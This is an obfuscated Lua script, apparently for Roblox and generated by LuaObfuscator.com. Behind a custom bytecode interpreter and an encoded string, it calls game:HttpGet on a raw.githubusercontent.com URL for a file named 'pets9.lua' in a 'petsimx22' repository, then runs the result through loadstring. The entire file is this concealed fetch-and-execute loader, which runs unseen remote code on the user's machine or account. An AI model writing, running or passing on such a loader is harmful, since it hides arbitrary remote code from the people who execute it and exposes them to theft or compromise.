--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v82=0;while true do if (v82==0) then v19=v0(v3(v30,1,1));return "";end end else local v83=0;local v84;while true do if (v83==0) then v84=v2(v0(v30,16));if v19 then local v102=0;local v103;while true do if (v102==1) then return v103;end if (v102==0) then v103=v5(v84,v19);v19=nil;v102=1;end end else return v84;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v85=0 -0 ;local v86;while true do if (((0 + 0) -0)==v85) then v86=(v31/((3 -1)^(v32-(2 -1))))%(2^(((v33-1) -(v32-(620 -(555 + 64)))) + ((1328 -396) -(857 + 74)))) ;return v86-(v86%(569 -((1432 -(68 + 997)) + (1471 -(226 + 1044))))) ;end end else local v87=927 -(214 + 713) ;local v88;while true do if (v87==(0 + 0)) then v88=(1 + 1)^(v32-(878 -((1227 -945) + 595))) ;return (((v31%(v88 + v88))>=v88) and (1638 -(1523 + (231 -(32 + 85))))) or 0 ;end end end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + 2 + 0 );v18=v18 + 1 + 1 ;return (v36 * (1213 -(892 + 65))) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(0 -0)) then v38,v39,v40,v41=v1(v16,v18,v18 + (4 -1) );v18=v18 + (354 -(87 + 263)) ;v37=181 -(67 + 113) ;end if (v37==1) then return (v41 * (12302277 + 4474939)) + (v40 * (160901 -(379026 -283661))) + (v39 * (189 + (1019 -(802 + 150)))) + v38 ;end end end local function v24() local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(5 -2)) then if (v47==(0 + 0)) then if (v46==(997 -(915 + 82))) then return v48 * ((0 -0) -(0 -0)) ;else local v104=(859 -(814 + 45)) + 0 ;while true do if (v104==0) then v47=1;v45=0 -0 ;break;end end end elseif (v47==(3234 -(1069 + 118))) then return ((v46==(0 -0)) and (v48 * ((1 -0)/0))) or (v48 * NaN) ;end return v8(v48,v47-((950 -(201 + 571)) + 845) ) * (v45 + (v46/(2^52))) ;end if (v42==(1 -(1138 -(116 + 1022)))) then v45=1 + (0 -0) ;v46=(v20(v44,(43 + 749) -(368 + 423) ,(22 + 40) -42 ) * ((20 -(10 + 8))^((1007 -(261 + 624)) -90))) + v43 ;v42=444 -((1731 -1315) + 26) ;end if (v42==(6 -4)) then v47=v20(v44,10 + 11 ,31);v48=((v20(v44,(99 -43) -24 )==(439 -((1225 -(1020 + 60)) + 293))) and  -(431 -(44 + 386))) or (1 + 0) ;v42=1489 -(998 + 488) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=(1424 -(630 + 793)) + 0 ;end end end local function v25(v49) local v50=0;local v51;local v52;while true do if (v50==(9 -6)) then return v6(v52);end if ((4 -3)==v50) then v51=v3(v16,v18,(v18 + v49) -((2 -1) + 0) );v18=v18 + v49 ;v50=6 -(15 -11) ;end if (v50==0) then v51=nil;if  not v49 then v49=v23();if (v49==(1747 -(7 + 753 + 987))) then return "";end end v50=1;end if (v50==(1915 -(1789 + 124))) then v52={};for v92=767 -(745 + 21) , #v51 do v52[v92]=v2(v1(v3(v51,v92,v92)));end v50=2 + 1 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v53=(function() return 0;end)();local v54=(function() return;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();while true do local v67=(function() return 0;end)();while true do if (v67~=(321 -(53 + 267))) then else if (0~=v53) then else local v98=(function() return 0;end)();local v99=(function() return;end)();while true do if (v98~=0) then else v99=(function() return 0;end)();while true do if (v99~=(1 + 0)) then else v56=(function() return {};end)();v57=(function() return {};end)();v99=(function() return 1026 -(706 + 318) ;end)();end if (v99~=(1251 -(721 + 530))) then else v54=(function() return function(v172,v173,v174) local v175=(function() return 1271 -(945 + 326) ;end)();while true do if (v175==0) then local v190=(function() return 0 -0 ;end)();local v191=(function() return;end)();while true do if (v190~=(0 + 0)) then else v191=(function() return 700 -(271 + 429) ;end)();while true do if (v191==(0 + 0)) then local v193=(function() return 0;end)();while true do if (v193==(0 + 0)) then v172[v173-#" " ]=(function() return v174();end)();return v172,v173,v174;end end end end break;end end end end end;end)();v55=(function() return {};end)();v99=(function() return 1501 -(1408 + 92) ;end)();end if (v99==(1088 -(461 + 625))) then v53=(function() return 127 -(116 + 10) ;end)();break;end end break;end end end break;end if (v67~=(0 + 0)) then else if (v53~=(740 -(542 + 196))) then else v58[ #"19("]=(function() return v21();end)();for v105= #"{",v23() do local v106=(function() return v21();end)();if (v20(v106, #",", #":")==(1288 -(993 + 295))) then local v128=(function() return 0;end)();local v129=(function() return;end)();local v130=(function() return;end)();local v131=(function() return;end)();local v132=(function() return;end)();while true do if (v128~=(1 + 0)) then else local v164=(function() return 0 + 0 ;end)();while true do if (v164==(1171 -(418 + 753))) then local v176=(function() return 0 + 0 ;end)();while true do if ((1 + 0)==v176) then v164=(function() return 1;end)();break;end if (v176==(0 + 0)) then v131=(function() return nil;end)();v132=(function() return nil;end)();v176=(function() return 1;end)();end end end if ((2 -1)==v164) then v128=(function() return 1 + 1 ;end)();break;end end end if (v128==(529 -(406 + 123))) then local v165=(function() return 0;end)();while true do if (v165==1) then v128=(function() return 1770 -(1749 + 20) ;end)();break;end if ((0 + 0)~=v165) then else local v177=(function() return 0 -0 ;end)();while true do if (v177==(1121 -(118 + 1003))) then v129=(function() return 0;end)();v130=(function() return nil;end)();v177=(function() return 1;end)();end if (v177==(1323 -(1249 + 73))) then v165=(function() return 1 + 0 ;end)();break;end end end end end if (v128~=(1147 -(466 + 679))) then else while true do if (v129~= #"-19") then else if (v20(v131, #"xnx", #"asd")== #" ") then v132[ #"http"]=(function() return v60[v132[ #"asd1"]];end)();end v55[v105]=(function() return v132;end)();break;end if (v129==(0 -0)) then local v179=(function() return 377 -(142 + 235) ;end)();local v180=(function() return;end)();while true do if (v179==(0 -0)) then v180=(function() return 0 -0 ;end)();while true do if (v180==(1 + 0)) then v129=(function() return  #"~";end)();break;end if (v180==(977 -(553 + 424))) then v130=(function() return v20(v106,2, #"asd");end)();v131=(function() return v20(v106, #"0836",1906 -(106 + 1794) );end)();v180=(function() return 1;end)();end end break;end end end if ((1 + 1)==v129) then local v181=(function() return 0;end)();local v182=(function() return;end)();while true do if ((0 + 0)~=v181) then else v182=(function() return 0 + 0 ;end)();while true do if (0==v182) then if (v20(v131, #"~", #"{")~= #"/") then else v132[2 + 0 ]=(function() return v60[v132[2]];end)();end if (v20(v131,2,5 -3 )~= #"}") then else v132[ #"-19"]=(function() return v60[v132[ #"gha"]];end)();end v182=(function() return 1;end)();end if (v182==(1 + 0)) then v129=(function() return  #"asd";end)();break;end end break;end end end if (v129== #">") then local v183=(function() return 0 -0 ;end)();local v184=(function() return;end)();while true do if (v183==(0 + 0)) then v184=(function() return 114 -(4 + 110) ;end)();while true do if (v184==1) then v129=(function() return 4 -2 ;end)();break;end if (v184==0) then v132=(function() return {v22(),v22(),nil,nil};end)();if (v130==(584 -(57 + 527))) then local v196=(function() return 0 -0 ;end)();while true do if (v196~=(0 + 0)) then else v132[ #"nil"]=(function() return v22();end)();v132[ #"0313"]=(function() return v22();end)();break;end end elseif (v130== #">") then v132[ #"91("]=(function() return v23();end)();elseif (v130==2) then v132[ #"91("]=(function() return v23() -((1429 -(41 + 1386))^(769 -(239 + 514))) ;end)();elseif (v130~= #"asd") then else local v202=(function() return 0;end)();local v203=(function() return;end)();while true do if (v202~=(0 + 0)) then else v203=(function() return 1329 -(797 + 532) ;end)();while true do if (v203==(0 + 0)) then v132[ #"91("]=(function() return v23() -(2^(119 -(17 + 86))) ;end)();v132[ #"0313"]=(function() return v22();end)();break;end end break;end end end v184=(function() return 1 + 0 ;end)();end end break;end end end end break;end end end end for v107= #".",v23() do v56,v107,v28=(function() return v54(v56,v107,v28);end)();end return v58;end if (1~=v53) then else local v101=(function() return 1202 -(373 + 829) ;end)();while true do if (v101~=(0 -0)) then else v58=(function() return {v55,v56,nil,v57};end)();v59=(function() return v23();end)();v101=(function() return 1;end)();end if (v101~=(733 -(476 + 255))) then else v53=(function() return 5 -3 ;end)();break;end if (v101~=(1 + 0)) then else v60=(function() return {};end)();for v133= #":",v59 do local v134=(function() return 0 -0 ;end)();local v135=(function() return;end)();local v136=(function() return;end)();local v137=(function() return;end)();while true do if (v134==(166 -(122 + 44))) then local v171=(function() return 0;end)();while true do if (v171==(1 -0)) then v134=(function() return 3 -2 ;end)();break;end if (v171~=(0 + 0)) then else v135=(function() return 0;end)();v136=(function() return nil;end)();v171=(function() return 1;end)();end end end if (v134~=(1 + 0)) then else v137=(function() return nil;end)();while true do if (v135~=(1 + 0)) then else if (v136== #"]") then v137=(function() return v21()~=(0 -0) ;end)();elseif (v136==(338 -(144 + 192))) then v137=(function() return v24();end)();elseif (v136== #"91(") then v137=(function() return v25();end)();end v60[v133]=(function() return v137;end)();break;end if (v135==(216 -(42 + 174))) then local v188=(function() return 65 -(30 + 35) ;end)();local v189=(function() return;end)();while true do if (v188==(0 + 0)) then v189=(function() return 1257 -(1043 + 214) ;end)();while true do if ((0 -0)==v189) then v136=(function() return v21();end)();v137=(function() return nil;end)();v189=(function() return 1213 -(323 + 889) ;end)();end if (v189~=1) then else v135=(function() return 2 -1 ;end)();break;end end break;end end end end break;end end end v101=(function() return 582 -(361 + 219) ;end)();end end end v67=(function() return 1;end)();end end end end local function v29(v61,v62,v63) local v64=v61[1];local v65=v61[5 -3 ];local v66=v61[3];return function(...) local v68=v64;local v69=v65;local v70=v66;local v71=v27;local v72=1 + 0 ;local v73= -1;local v74={};local v75={...};local v76=v12("#",...) -(1976 -(1913 + (169 -107))) ;local v77={};local v78={};for v89=0 + 0 + 0 ,v76 do if (v89>=v70) then v74[v89-v70 ]=v75[v89 + 1 ];else v78[v89]=v75[v89 + (2 -1) ];end end local v79=(v76-v70) + 1 ;local v80;local v81;while true do v80=v68[v72];v81=v80[1934 -(565 + 1368) ];if ((4615==4615) and (v81<=(11 -8))) then if (v81<=(1662 -(1477 + 184))) then if ((v81==(0 -0)) or (3790==500)) then local v108=0 + 0 + 0 ;local v109;local v110;local v111;local v112;while true do if ((856 -(564 + 292))==v108) then v109=v80[2 -(0 -0) ];v110,v111=v71(v78[v109](v13(v78,v109 + (2 -1) ,v80[307 -(244 + 36 + 24) ])));v108=1 + 0 ;end if ((478 -((204 -(92 + 71)) + 435))==v108) then for v166=v109,v73 do local v167=0;while true do if ((89<221) and (v167==(1001 -(938 + 63)))) then v112=v112 + 1 + 0 ;v78[v166]=v110[v112];break;end end end break;end if (v108==(1126 -(936 + 189))) then v73=(v111 + v109) -(1 + 0) ;v112=0;v108=2;end end else local v113=(797 + 816) -((2631 -1066) + 48) ;local v114;local v115;local v116;local v117;local v118;while true do if (v113==(0 + 0)) then v114=nil;v115,v116=nil;v117=nil;v118=nil;v113=1139 -((1547 -(574 + 191)) + 356) ;end if ((2054>=1421) and (v113==(271 -(176 + 76 + 15)))) then v78[v80[4 -2 ]]=v80[3];v72=v72 + (1 -0) ;v80=v68[v72];v118=v80[(2740 -1646) -(975 + 117) ];v113=1880 -(157 + 878 + 840) ;end if (v113==(7 + 1)) then v80=v68[v72];do return;end break;end if (v113==5) then v115,v116=v71(v78[v118](v13(v78,v118 + (3 -2) ,v80[10 -7 ])));v73=(v116 + v118) -(1019 -(697 + 321)) ;v114=0 -0 ;for v168=v118,v73 do v114=v114 + (1 -0) ;v78[v168]=v115[v114];end v113=13 -(856 -(254 + 595)) ;end if (v113==(3 + 4)) then v72=v72 + (1 -0) ;v80=v68[v72];v78[v80[5 -(129 -(55 + 71)) ]]();v72=v72 + (1228 -(322 + 905)) ;v113=619 -(602 + 9) ;end if ((692<3058) and (v113==1)) then v78[v80[2]]=v63[v80[3]];v72=v72 + ((1567 -377) -(449 + 740)) ;v80=v68[v72];v78[v80[874 -(826 + 46) ]]=v63[v80[3]];v113=949 -((2035 -(573 + 1217)) + 702) ;end if (v113==(6 -4)) then v72=v72 + 1 ;v80=v68[v72];v118=v80[1 + 1 ];v117=v78[v80[1901 -(260 + 1638) ]];v113=443 -(382 + 58) ;end if (v113==(9 -6)) then v78[v118 + 1 ]=v117;v78[v118]=v117[v80[4 + 0 ]];v72=v72 + (1 -(0 -0)) ;v80=v68[v72];v113=11 -7 ;end if (v113==((93 + 1118) -(902 + 303))) then v72=v72 + ((1 -0) -0) ;v80=v68[v72];v118=v80[(943 -(714 + 225)) -2 ];v78[v118]=v78[v118](v13(v78,v118 + 1 + 0 ,v73));v113=1697 -(1121 + (1662 -1093)) ;end end end elseif (v81==(216 -(22 + 192))) then local v119=v80[685 -(483 + (278 -78)) ];v78[v119]=v78[v119](v13(v78,v119 + (1464 -(153 + 1251 + (84 -25))) ,v73));else v78[v80[5 -3 ]]=v63[v80[(809 -(118 + 688)) -0 ]];end elseif (v81<=(770 -(468 + 297))) then if ((v81==(566 -(334 + 228))) or (3254==1655)) then local v123=0;local v124;local v125;while true do if ((v123==(3 -2)) or (1296==4910)) then v78[v124 + 1 ]=v125;v78[v124]=v125[v80[8 -4 ]];break;end if (v123==(0 -0)) then v124=v80[2];v125=v78[v80[3]];v123=1 + 0 ;end end else v78[v80[2]]();end elseif ((3368==3368) and (v81==(242 -((189 -(25 + 23)) + 95)))) then v78[v80[2 + 0 ]]=v80[7 -(1 + 3) ];else do return;end end v72=v72 + (2 -1) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403543Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A757374616E6F74686572646D652F70657473696D782Q322F726566732F68656164732F6D61696E2F70657473392E6C756100083Q0012013Q00013Q00122Q000100023Q00202Q00010001000300122Q000300046Q000100039Q0000026Q000100016Q00017Q00",v9(),...);
